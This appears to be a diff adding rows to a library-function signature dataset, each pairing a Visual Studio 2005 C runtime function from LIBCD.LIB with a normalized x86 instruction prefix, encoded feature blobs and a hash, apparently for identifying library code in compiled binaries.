+__exit,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",l2ov5AAAAAAAAAAA,XqODJ1KlaoQAAAAA7T1cVkC6y0Feo4MnBjZA6JyGUTji3M2sfV+3jQY2QOiDrkNeENqjI8bSyS0kA8OdxtLJLZyGUTji3M2sT4vMCgAAAAAAAAAAJAPDnQY2QOh9X7eNnIZROEC6y0Feo4MnUqVqhAY2QOiDrkNeg65DXl6jgycAAAAAoMVw5sbSyS0kA8OdXqODJ0+LzAoAAAAAchMCgKDFcOYQ2qMjQLrLQQAAAAAAAAAA4tzNrJyGUTjtPVxW,4406b11a8b77bc0b6d322111f63b43c891459729,VS2005,LIBCD.LIB
+_strncat,"MOV R32,DWORD PTR DS:[R32]\nMOV R32,CONST\nADD R32,R32\nXOR R32,CONST\nXOR R32,R32\nADD R32,CONST\nTEST R32,CONST\nJCC CONST",F/SuzwAAAAAAAAAAWNooOlylOYktDNr2LQza9glmNtQtDNr2V1CNvgAAAAAAAAAAXKU5iej+gdBY2ig6LQza9mXput12rOrsWNooOlylOYk1KUAydqzq7NiQfKSX2nuULsHC/TUpQDJcpTmJNSlAMjUpQDKEcIcdl9p7lHas6uxl6brdZem63QAAAAAAAAAA2JB8pAAAAAAAAAAAQ1BuJAAAAAAAAAAA8BrWpAAAAAAAAAAAhHCHHW3vck/YzQSmiIgyDi0M2vYJZjbU2M0EpsSSpmjoVavaCWY21IiIMg7YzQSmXqODJy0M2vYAAAAA6FWr2jUpQDLo/oHQ9IuYKENQbiQuwcL96P6B0DwKGl0AAAAAxJKmaDwKGl0AAAAAxJKmaDwKGl0AAAAA2M0EpvAa1qTYzQSmbe9yT1ylOYktDNr22M0EpldQjb5Y2ig6PAoaXVylOYktDNr2WNooOhf0rs9Y2ig6WNooOoiIMg4QAa5nLQza9glmNtReo4MnEAGuZwAAAAAAAAAAXKU5ifAa1qQFHO/v6FWr2sSSpmjoVavaBRzv72Xput1Y2ig6,[],6f3a3a9fcf0000aac13ccbcc4b68928130e26e3d,VS2005,LIBCD.LIB
+_mbtowc,"XOR R32,R32\nCMP DWORD PTR SS:[EBP+CONST],0\nSETNE R8\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]",ZnkxNaqT3bIAAAAAJAPDnWFPRVachlE47ois/nWtSw3dLNxtnIZROPzEoKomuqkD3SzcbVLDT0B1rUsNJrqpA6qT3bIAAAAAoWDqNuRSvJ8kA8OdJAPDneRSvJ8kA8Od/MSgqqqT3bIAAAAAJAPDneRSvJ+S9NEBYU9FVte19dskA8OdUsNPQKqT3bIAAAAAkvTRAeRSvJ91gwav17X12+Nr2ox1rUsNJAPDne6IrP7uiKz+dYMGryQDw52chlE45FK8nyQDw52chlE47ois/u6IrP4Gov60da1LDaqT3bIAAAAAnIZROGZ5MTWchlE4nIZROKQXY29meTE1da1LDaqT3bIAAAAABqL+tFLDT0DuiKz+ZnkxNaqT3bIAAAAApBdjbyQDw52chlE442vajAAAAAAAAAAAqpPdsgAAAAAAAAAAnIZROGZ5MTVm2dqNZtnajaqT3bIAAAAA,[],473b0edb8a2bf42bd2fdc9da6072e6ba058a4c9f,VS2005,LIBCD.LIB
+__mbsnbcmp,"MOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nXOR R32,R32\nCMP R32,R32\nSETLE R8\nDEC R32",zgSLcWZrldychlE4ZmuV3FJnfwbSBT6EnIZROOHZBXn351Au9+dQLkGcaOT0Ke4IVaatKCQDw51meTE10gU+hE+LzAoAAAAAZnkxNU+LzAoAAAAAJAPDnYhCHwx2ZN6Y9CnuCIjmoBIAAAAAdmTemE+LzAoAAAAAnIZROLFGFJ3jyoV0QZxo5IjmoBIAAAAA48qFdGZrldwAAAAAiOagEmZrldwAAAAAUmd/BjUWchMNzMABsUYUnUx8YWb0Ke4IiEIfDCbu4WXOBItx4dkFedHmnNP0Ke4IDczAAU+LzAoAAAAANRZyE4hCHwwAAAAA9CnuCPMRN8sAAAAA9CnuCPMRN8sAAAAAT4vMCgAAAAAAAAAA8xE3y84Ei3EAAAAAJu7hZU+LzAoAAAAAzgSLcc4Ei3GchlE4THxhZvMRN8sAAAAA0eac0/MRN8sAAAAA8xE3y2ZrldwAAAAA,[],118f93938b85cfdd247b02ec1e9c8f326a7a548b,VS2005,LIBCD.LIB
+__y1,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nFLD QWORD PTR SS:[EBP+CONST]\nFCOMP QWORD PTR DS:[0]\nFSTSW R16\nTEST R8,CONST\nJCC CONST",Qdafi0+LzAoAAAAAOewwt0+LzAoAAAAAjaAebEHWn4tFNllQ5Lww242gHmw57DC3T4vMCgAAAAAAAAAARTZZUE+LzAoAAAAA,[],f04c026486903e3ce1994ddd2ac6d88382ee43e9,VS2005,LIBCD.LIB
+__y0,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nFLD QWORD PTR SS:[EBP+CONST]\nFCOMP QWORD PTR DS:[0]\nFSTSW R16\nTEST R8,CONST\nJCC CONST",5Lww242gHmw57DC3Qdafi0+LzAoAAAAAxefPX0+LzAoAAAAAOewwt0+LzAoAAAAAT4vMCgAAAAAAAAAAjaAebEHWn4vF589f,[],6e0942ac7c4761be80d2a459dbd09ed72d053690,VS2005,LIBCD.LIB
+__jn,"FILD DWORD PTR SS:[EBP+CONST]\nFSTP QWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",DbMgaYOuQ14AAAAAsxrqKpyGUTgAAAAA7BZUa35JIRjd4ynDhsBzYn5JIRheo4MnnIZROJyGUTgrieMfK4njH0+LzAoAAAAAPsqG2YOuQ14AAAAAnIZROI2gHmwrieMfK4njH0+LzAoAAAAAXqODJ5BEAV0AAAAAfkkhGIbAc2IAAAAAAABf6X5JIRjd4ynD1AstUT7KhtkAAAAAkEQBXU+LzAoAAAAAg65DXj3YlGTUCy1RjaAebEHTVHorY9X0PdiUZIbAc2IAAAAAK2PV9E+LzAoAAAAAT4vMCgAAAAAAAAAAQdNUeg2zIGnsFlRr3eMpw0+LzAoAAAAAfkkhGAAAX+kAAAAAVaatKJyGUTizGuoq,[],e628bac0857ed7cd5984efed4ffcdf59115a401c,VS2005,LIBCD.LIB
+__j0,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nFLD QWORD PTR SS:[EBP+CONST]\nFCOMP QWORD PTR DS:[0]\nFSTSW R16\nTEST R8,CONST\nJCC CONST",T4vMCgAAAAAAAAAAyAE2AU+LzAoAAAAAQdafi0+LzAoAAAAAPKfU6kHWn4vIATYBjaAebEHWn4vIATYB5Lww242gHmw8p9Tq,[],e939635b3e0e6e8dead59609cfa4337087957649,VS2005,LIBCD.LIB
+__j1,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],CONST\nFLD QWORD PTR SS:[EBP+CONST]\nFCOMP QWORD PTR DS:[0]\nFSTSW R16\nTEST R8,CONST",F1K7vE+LzAoAAAAAN5RlAyTXMe8XUru8WwK4aI2gHmw3lGUDjaAebCTXMe8XUru8T4vMCgAAAAAAAAAAJNcx70+LzAoAAAAA,[],5cac99e467aba558b0d70ef569744cda26a066a3,VS2005,LIBCD.LIB
+__yn,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nFLD QWORD PTR SS:[EBP+CONST]\nFCOMP QWORD PTR DS:[0]\nFSTSW R16\nTEST R8,CONST\nJCC CONST",l9N6LU+LzAoAAAAAnIZROFQWlaCs7V8OrO1fDk+LzAoAAAAAxsd/RJyGUTiWc/BfVBaVoIOuQ14AAAAAPsqG2YOuQ14AAAAArO1fDk+LzAoAAAAAg65DXpfTei3PPBMkT4vMCgAAAAAAAAAAzzwTJD7KhtkAAAAAOewwt0+LzAoAAAAA5Lww2zqNu5c57DC3lnPwX5yGUTgAAAAAOo27l5yGUTjGx39EnIZROJyGUTis7V8O,[],a7b63537f3d380e6e8d762818509b65f9162f1e9,VS2005,LIBCD.LIB
+__fptostr,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOVSX R32,BYTE PTR DS:[R32]\nCMP R32,CONST\nJCC CONST",lnPwX89FcgwAAAAApBdjb5Zz8F8ekjTyZ8SFDm1JBQZtSQUGz0VyDJyGUTgAAAAAFRE9lU+LzAoAAAAAHpI08s9FcgwAAAAAbUkFBhURPZUTMfSvT4vMCgAAAAAAAAAAbUkFBm1JBQbT2nofbUkFBoKSzOcNOYnXDTmJ121JBQYAAAAAEzH0r0+LzAoAAAAAXujvaJyGUTgAAAAA09p6H4KSzOcNOYnXnIZROGfEhQ6kF2NvgpLM521JBQYAAAAA,[],8dfe1d4b9b4b48e5f92f6e276d0ec1f2349e8726,VS2005,LIBCD.LIB
+__strrev,"MOV R8,BYTE PTR DS:[R32]\nMOV R8,BYTE PTR DS:[R32]\nMOV BYTE PTR DS:[R32],R8\nMOV BYTE PTR DS:[R32],R8\nINC R32\nDEC R32\nJMP SHORT CONST",MRpQyHLoOkUAAAAAcug6RcjPaIqr44iPq+OIj3LoOkUAAAAAZ0IVHMjPaIoxGlDIyM9oigAAAAAAAAAA,[],0ec2e892c8d74b2913f04bfd18cbe2694e290d3a,VS2005,LIBCD.LIB
+__mbspbrk,"MOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32+CONST]\nAND R32,CONST\nTEST R32,R32\nJCC CONST",XqODJz7KhtkAAAAA4dkFeXfcttheo4MnPsqG2eHZBXkAAAAA4dkFeeHZBXl33LbYXqODJxvgwFEAAAAA+E38Kl6jgydeo4Mnd9y22DUWchOxRhSdd9y22PhN/Cr4TfwqsUYUnTUWchNeo4Mn+E38Kg/RU+3/vke7EIVrf3FalDorieMfXqODJxvgwFEAAAAANRZyE0QNQ6UAAAAA/75Hu16jgycP0VPtG+DAUYSQFecAAAAAK4njH0+LzAoAAAAAhJAV50+LzAoAAAAAT4vMCgAAAAAAAAAAD9FT7chSX9deo4MncVqUOhSSUkEAAAAAXqODJ+HZBXkAAAAAyFJf116jgycAAAAARA1DpRvgwFFxWpQ6FJJSQRvgwFFxWpQ6cVqUOuHZBXkAAAAAXqODJ+HZBXkAAAAA,[],096c8c22a218e7cbfd87b556df4bc0bc62dad969,VS2005,LIBCD.LIB
+_strcmp,"MOV R16,WORD PTR DS:[R32]\nADD CONST,CONST\nCMP R8,BYTE PTR DS:[R32]\nJCC CONST",rZMNRVLONpVY2ig6FMSIatok6RVMYWxWUWjWUNok6RXYzQSm2M0EplLONpUUxIhqYYMmR9ok6RWtkw1FTGFsVlFo1lAm7uFl2M0EplLONpUHYZ6GFMSIatok6RXYzQSmWNooOlFo1lCzTHFDFMSIatok6RXYzQSmUs42lQAAAAAAAAAA2M0EplLONpXEkqZoJu7hZVLONpUAAAAAxJKmaFFo1lAAAAAAESeFcFjaKDpRaNZQB2Gehtok6RXYzQSm2iTpFQAAAAAAAAAAs0xxQ9ok6RXYzQSm2M0EplLONpUUxIhq2M0EplLONpUUxIhqWNooOrNMcUNhgyZH,[],af97b1f0a5de1ac71e07fc6431503061a82ebd3a,VS2005,LIBCD.LIB
+__spawnvp,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",yCGT8gAAAAAAAAAA,uz1JhQAAAAAAAAAAXqODJ5yGUTgAAAAAXqODJ40v/IgAAAAAbUkFBo0v/Ii5zn1Gk90UgbxVM4iT3RSBNRZyE5yGUTgAAAAANRZyE/Pmj5YAAAAA5FK8n6QXY2+chlE48+aPlpyGUThRXDRXuc59RjUWchNAPBIrO4+r5eRSvJ8AAAAA5FK8n+4docTe4Od/3uDnfzUWchMkA8Odk90UgV6jgye8VTOInIZROORSvJ+S9NEBjS/8iDUWchNAPBIr7xfqreRSvJ+S9NEBvFUziDUWchO8VTOIUVw0V5yGUThisDXgJAPDnTUWchOT3RSBO4+r5eRSvJ8AAAAA5FK8n5yGUTiDrkNeJAPDnTUWchN0wPhwnIZROORSvJ+S9NEBg65DXuRSvJ+S9NEBYrA14G1JBQaT3RSBkvTRAeRSvJ91gwavdMD4cDUWchM1dZFUkvTRAeRSvJ87j6vlkvTRAeRSvJ87j6vlQDwSK97g538AAAAAvFUziDUWchNeo4MnNXWRVDUWchMCzreONRZyE5yGUTgAAAAA3uDnf16jgyckA8OddYMGr5yGUTikF2Nv5FK8n5yGUTikF2Nvk90UgV6jgycAAAAAO4+r5eRSvJ8AAAAA5FK8n4OuQ17uHaHEpBdjb+RSvJ+S9NEB7h2hxORSvJ+S9NEBnIZROLs9SYVWMtm8As63jvPmj5Y1FnITkvTRAeRSvJ91gwavVjLZvAAAAAAAAAAAkvTRAeRSvJ87j6vldYMGr6QXY2+chlE4,300effbe9e8d6bd80d7fcc98436b02b9f2a59c8c,VS2005,LIBCD.LIB
+__powhlp,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],0\nFLD QWORD PTR SS:[EBP+CONST]\nFCOMP QWORD PTR DS:[0]\nFSTSW R16\nTEST R8,CONST",uZa2nPQp7ggAAAAAjaAebC83WfyjEyGe/juGVTUWchMAAAAAAkgqPtUc1LYAAAAA9CnuCDUWchMAAAAAoxMhnjUWchMAAAAAWwK4aC1Pkye94R75uSttrDUWchMAAAAAoxMhnjUWchMAAAAAjaAebLkrbaychlE4Nuv1LTUWchMAAAAANRZyE9Uc1LYAAAAAveEe+WQwEhoAAAAALzdZ/DUWchMAAAAAnIZRODz5nXCujYbcfkZDdNUc1LZpzQYAro2G3AJIKj4AAAAAiw0UTIsNFEychlE4ac0GANUc1LYPe7CvNRZyE9Uc1LYAAAAALU+TJ4sNFEychlE4iw0UTH5GQ3SchlE4D3uwr42gHmychlE4PPmdcAJIKj4AAAAAZDASGosNFEychlE4nIZROH5GQ3SNoB5sjaAebI2gHmz+O4ZVAkgqPtUc1LYAAAAAjaAebI2gHmyjEyGeNRZyE9Uc1LYAAAAAnIZROIsNFEyNoB5s/juGVTUWchMAAAAAuSttrNUc1LYAAAAAjaAebI2gHmxOOp/anIZROGj2WNcVpbdvnIZROIsNFEyNoB5sFaW3bwJIKj4AAAAA1RzUtgAAAAAAAAAATjqf2jUWchMAAAAAjaAebLkrbay5lracaPZY1wJIKj4AAAAAjaAebDbr9S3+O4ZV,[],8d0434c46c9bd192efa2c0050cbd8b5ed0e4337c,VS2005,LIBCD.LIB
+__d_inttype,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nFSTP QWORD PTR SS:[EBP+CONST]\nFLD QWORD PTR SS:[EBP+CONST]",l3FRnk+LzAoAAAAAl3FRnk+LzAoAAAAAJu7hZU+LzAoAAAAAR8k3yybu4WUEMS/DT4vMCgAAAAAAAAAADczAAU+LzAoAAAAAQYaTC0fJN8sNzMABBDEvw5dxUZ6XcVGe,[],9c44d29c2f5bae919d24975ce813b0290369aba7,VS2005,LIBCD.LIB
+__wexecl,"PUSH CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nPOP R32",5FK8nyEgQSXELzX+kvTRAeRSvJ87j6vlO4+r5eRSvJ8AAAAAISBBJeRSvJ+S9NEB5FK8nyEgQSWchlE4kvTRAeRSvJ87j6vlrKbWTpyGUTgAAAAAnIZROORSvJ+S9NEBkvTRAeRSvJ87j6vlO4+r5eRSvJ8AAAAA5FK8n5yGUTghIEElnIZROORSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8n5yGUTghIEElxC81/gAAAAAAAAAAkvTRAeRSvJ87j6vlISBBJeRSvJ+S9NEBO4+r5eRSvJ8AAAAA,[],a6b428bafafc49eeb6025b5bd65111dfc10894c3,VS2005,LIBCD.LIB
+_strtoul,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",yCGT8gAAAAAAAAAA,z7hmkpyGUTgAAAAArf0auUFF0BsAAAAADpXpTJyGUTgOlelMJAPDnfvZbvJy8imssG8WBpyGUTgAAAAAQjnJB4OuQ14AAAAAQUXQG0+LzAoAAAAAbUkFBnVGmM5tSQUGT4vMCgAAAAAAAAAAcvIprJyGUTgAAAAAg65DXgYK4DFvcIwNb3CMDQYK4DHBT/0nJAPDnbzhvbzPuGaSiw0UTCKUXPMOlelMnIZROJyGUTichlE4BgrgMSQDw50AAAAAnIZROJyGUTichlE4DpXpTJyGUTiLDRRM9CnuCJyGUTgAAAAAnIZROJyGUTichlE49CnuCJyGUTgAAAAA+9lu8nuqf+GEa6vzbUkFBvK3JYN1RpjOnIZROGZ5MTXxZLvObUkFBvQp7ghtSQUG8WS7zmZ5MTUAAAAAIpRc8w6V6Uz0Ke4IZnkxNU+LzAoAAAAAvOG9vF6jgydl/eoO795axyQDw50AAAAA8rclgwVOIMFt71VUnIZROJyGUTh7qn/hnIZROHuqf+GEa6vzhGur8yQDw50AAAAAe6p/4W1JBQb0Ke4Ie6p/4fK3JYNtSQUG9CnuCJyGUTgAAAAAJAPDnQVOIMFt71VU9CnuCJyGUTgAAAAADpXpTJZz8F/0Ke4IsAaWVQ6V6UychlE4dUaYzvK3JYMAAAAADpXpTA6V6UyLDRRMnIZROCQDw51COckHnIZROF6jgydl/eoObb8RBZyGUTgAAAAAe6p/4Xuqf+FtvxEFZf3qDoOuQ14AAAAAwU/9J+/eWscAAAAAy+pRu/vZbvJy8imsbUkFBpZz8F/0Ke4IlnPwX5yGUTgAAAAAnIZROPQp7ghUwZr8be9VVJyGUTgAAAAABU4gwSQDw51COckHnIZROA6V6UzxZLvOiw0UTJyGUTgilFzz9CnuCJyGUTgAAAAAVMGa/JyGUTgAAAAA8WS7zg6V6UwAAAAAXqODJ7AGllUAAAAAg65DXgmX7pxeo4MnlnPwX5yGUTgAAAAADpXpTEFF0But/Rq5DpXpTCKUXPMOlelMCZfunMFP/SeDrkNeXqODJ7AGllUAAAAAnIZROPK3JYN7qn/he6p/4ZyGUTiwbxYG,93da81352ca9c14dcb799bfc9926b6291abc164f,VS2005,LIBCD.LIB
+_strtol,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",yCGT8gAAAAAAAAAA,bUkFBnVGmM5tSQUGT4vMCgAAAAAAAAAAcvIprJyGUTgAAAAAg65DXgYK4DFvcIwNDpXpTA6V6UyLDRRMJAPDnfvZbvJy8imsJAPDnbzhvbzPuGaSiw0UTCKUXPMOlelMnIZROJyGUTichlE4bUkFBvQp7ghtSQUGwU/9J+/eWscAAAAAnIZROJyGUTichlE4DpXpTJyGUTiLDRRMdUaYzvK3JYMAAAAAnIZROJyGUTichlE4be9VVJyGUTgAAAAA+9lu8nuqf+GEa6vznIZROGZ5MTXxZLvO8WS7zmZ5MTUAAAAAIpRc8w6V6Uz0Ke4IZnkxNU+LzAoAAAAACZfunMFP/SeDrkNevOG9vF6jgydl/eoO795axyQDw50AAAAA8rclgwVOIMFt71VUnIZROJyGUTh7qn/hiw0UTJyGUTgilFzzz7hmkpyGUTgAAAAAnIZROF6jgydl/eoOe6p/4W1JBQb0Ke4I9CnuCJyGUTgAAAAAnIZROHuqf+GEa6vzbb8RBZyGUTgAAAAA9CnuCJyGUTgAAAAAb3CMDQYK4DHBT/0nDpXpTJZz8F/0Ke4IsAaWVQ6V6UychlE49CnuCJyGUTgAAAAAnIZROCQDw51COckHe6p/4Xuqf+FtvxEFZf3qDoOuQ14AAAAA+Hf5wfQp7ggAAAAAy+pRu/vZbvJy8imsbUkFBpZz8F/0Ke4IlnPwX5yGUTgAAAAAnIZROPQp7gj4d/nB9CnuCJyGUTgAAAAABU4gwSQDw51COckHnIZROA6V6UzxZLvObUkFBvK3JYN1RpjO9CnuCJyGUTgAAAAAe6p/4fK3JYNtSQUGJAPDnQVOIMFt71VU8WS7zg6V6UwAAAAAXqODJ7AGllUAAAAAg65DXgmX7pxeo4MnlnPwX5yGUTgAAAAABgrgMSQDw50AAAAADpXpTEFF0But/Rq5DpXpTCKUXPMOlelMXqODJ7AGllUAAAAAnIZROPK3JYN7qn/he6p/4ZyGUTiwbxYGrf0auUFF0BsAAAAADpXpTJyGUTgOlelMhGur8yQDw50AAAAAsG8WBpyGUTgAAAAAQjnJB4OuQ14AAAAAQUXQG0+LzAoAAAAA,300effbe9e8d6bd80d7fcc98436b02b9f2a59c8c,VS2005,LIBCD.LIB
+__CIlog,"SUB ESP,CONST\nFST QWORD PTR SS:[ESP]\nCALL CONST\nCALL CONST\nADD ESP,CONST\nRETN",2jyUmAAAAAAAAAAA,AaF1swAAAAAAAAAAdqHX0LygXegBoXWzvKBd6AAAAAAAAAAA,9a6bfc6ccf2cdc17e3b0d328a8c54c666c653509,VS2005,LIBCD.LIB
+_log,"LEA R32,DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPUSH R32\nWAIT\nFSTCW WORD PTR SS:[ESP]\nJCC CONST",6FWr2jfULVPNLBGmQu6jUbOTIAyzkyAM0UiUpbOTIAyzkyAMN9QtU9FIlKUAAAAA0UiUpZ8T3I+fE9yPzSwRpjfULVPoVava2OAoGehVq9roVava6FWr2kLuo1HNLBGmAFkkeehVq9r4Pk1X6FWr2tFIlKVWICeY6FWr2uhVq9roVavas5MgDOhVq9oAAAAAzSwRpkLuo1GQ4qERnxPcjwAAAAAAAAAAViAnmNFIlKUAAAAA6FWr2lYgJ5hC7qNRkOKhEZ8T3I+fE9yP+D5NV+hVq9rY4CgZ,[],38bdcbc1e1ecb7e2cb258925310cb297c737b5d1,VS2005,LIBCD.LIB
+_ctime,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nJMP SHORT CONST",R+79Vuq2imz+Ikd8/iJHfE+LzAoAAAAAT4vMCgAAAAAAAAAA6raKbAAAAAAAAAAA,[],06b6d59e46cb8bb73ba1a0271bbde50ea37b19cc,VS2005,LIBCD.LIB
+___crtLCMapStringA,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR DS:[0],CONST",Ju7hZTEuOrEAAAAAMS46sQAAAAAAAAAAGaZm/5yGUTgAAAAAnIZROCQDw5068AAFZnkxNTEuOrEAAAAALaOCjZyGUTgINZxhDczAATEuOrEAAAAABWqbOTUWchNmeTE1nIZROMh6ZVI3kax8ZnkxNTEuOrEAAAAAENnMP5yGUTgAAAAAN5GsfF6jgycNzMABZnkxNTEuOrEAAAAAfsO4N1JnfwZmeTE1ZnkxNTEuOrEAAAAAGaZm/5yGUTgAAAAA6BcFF5yGUTgAAAAAOvAABdFIlKUkPsFMJAPDndFIlKUkPsFMJD7BTDEuOrEAAAAACDWcYQg1nGEZpmb/NRZyE6A3OqEAAAAADczAATEuOrEAAAAAXqODJ6A3OqEAAAAAyHplUqA3OqENzMABUmd/BhDZzD+chlE4nIZRODUWchODrkNe0UiUpSbu4WWchlE4g65DXgVqmzlmeTE1ZnkxNTEuOrEAAAAAasrPFn7DuDdmeTE1nIZROAVqmzlmeTE1ZnkxNTEuOrEAAAAACDWcYWZ5MTUZpmb/nIZROBGTm44Nbef8ZnkxNTEuOrEAAAAAnIZROGrKzxZmeTE1DW3n/OgXBRdmeTE1BWqbOZyGUTgNzMABZnkxNTEuOrEAAAAADczAATEuOrEAAAAAEZObjugXBRdmeTE1oDc6oTEuOrEAAAAA,[],cf34565f227ed72b22da43d2cd5c23f886214545,VS2005,LIBCD.LIB
+__lrotr,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",jc0jjAAAAAAAAAAA,fQlINNUc1Lb7B3z4+wd8+F6jgycAAAAAXqODJ30JSDQAAAAAtpRIr9Uc1Lb7B3z41RzUtgAAAAAAAAAA,ecbf48519510b8087b8a3a1b0a6178d2893b9988,VS2005,LIBCD.LIB
+__rotr,"MOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nSHR R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",tpRIr9Uc1Lb7B3z41RzUtgAAAAAAAAAAfQlINNUc1Lb7B3z4+wd8+F6jgycAAAAAXqODJ30JSDQAAAAA,[],f0dfe80437133ca2d0b658db56164854b7fa267e,VS2005,LIBCD.LIB
+__fload,"PUSH EBP\nMOV EBP,ESP\nADD ESP,-0C\nPUSH R32\nMOV R16,WORD PTR SS:[EBP+CONST]\nMOV R16,R16\nAND R16,CONST\nCMP R16,CONST",kdu5906gi7EAAAAAkkdARZHbufeQsHuQTqCLsQAAAAAAAAAAkLB7kE6gi7EAAAAA,[],78cec4c203b18fae9507745442e5a193c74213a0,VS2005,LIBCD.LIB
+__ctrandisp2,"PUSH EBP\nMOV EBP,ESP\nADD ESP,-2A0\nPUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nADD ESP,CONST",5fTU+wAAAAAAAAAA,gfUAOk6gi7EAAAAA1D5wlwAAAAAAAAAAkkdARdQ+cJeB9QA6TqCLsQAAAAAAAAAA,2524fd33ef9f5da296e7d39c3c6fd0d26afeda5f,VS2005,LIBCD.LIB
+__cintrindisp2,"PUSH EBP\nMOV EBP,ESP\nADD ESP,-2A0\nPUSH R32\nWAIT\nFSTCW WORD PTR SS:[EBP+CONST]\nWAIT\nCMP DWORD PTR DS:[0],0",3POx9JfzhTsAAAAAh+u1AtzzsfSX84U7l/OFOwAAAAAAAAAA,[],da22b4e5f31c9ccb3d4307a4ed8a2dcf4aabc8ed,VS2005,LIBCD.LIB
+__cintrindisp1,"PUSH EBP\nMOV EBP,ESP\nADD ESP,-2A0\nPUSH R32\nWAIT\nFSTCW WORD PTR SS:[EBP+CONST]\nCMP DWORD PTR DS:[0],0\nJCC CONST",npMk1pfzhTsAAAAADr+xfJ6TJNaX84U7l/OFOwAAAAAAAAAA,[],912bb24af64f99274bd9c8622ff778b3482c5b54,VS2005,LIBCD.LIB
+__ctrandisp1,"PUSH EBP\nMOV EBP,ESP\nADD ESP,-2A0\nPUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nADD ESP,CONST",ynGGsAAAAAAAAAAA,kkdARZHbufeB9QA6TqCLsQAAAAAAAAAAgfUAOk6gi7EAAAAAkdu5906gi7EAAAAA,7402217e861202a8526345f068c9a55226c4e909,VS2005,LIBCD.LIB
+__itoa,"PUSH EBP\nMOV EBP,ESP\nCMP DWORD PTR SS:[EBP+CONST],CONST\nJCC CONST",cMiU5JFJ3vWchlE4nIZROJFJ3vWFhApehYQKXtiy05kAAAAA2LLTmQAAAAAAAAAAkUne9diy05kAAAAA,[],04828bfb11c2fdce06d4275f26a6089e21a65fbc,VS2005,LIBCD.LIB
+__ultoa,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",owBRUQAAAAAAAAAA,nIZROCtW4FhffqqIX36qiIpTDDMAAAAAT4vMCgAAAAAAAAAASzUXYW7IpPSEUvxnZMG1bytW4FhffqqIbsik9GTBtW/5xCB7ilMMM4pTDDNPi8wK+cQge5yGUTgAAAAAK1bgWGTBtW/5xCB7hFL8Z27IpPQAAAAA,8e896dcca3aec18878ce0686cf9f5bbfe8974232,VS2005,LIBCD.LIB
+__i64toa,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nCMP DWORD PTR SS:[EBP+CONST],CONST\nJCC CONST",IYd5Y/Qp7gichlE4nIZROJZNiEP0Ke4I9CnuCNumBfYAAAAAjLRRTpZNiEOchlE4lk2IQwAAAAAAAAAA26YF9gAAAAAAAAAAnIZROJZNiEMhh3lj,[],4a6a071d50696db6f4fe9a79a5dd4c161b6c5796,VS2005,LIBCD.LIB
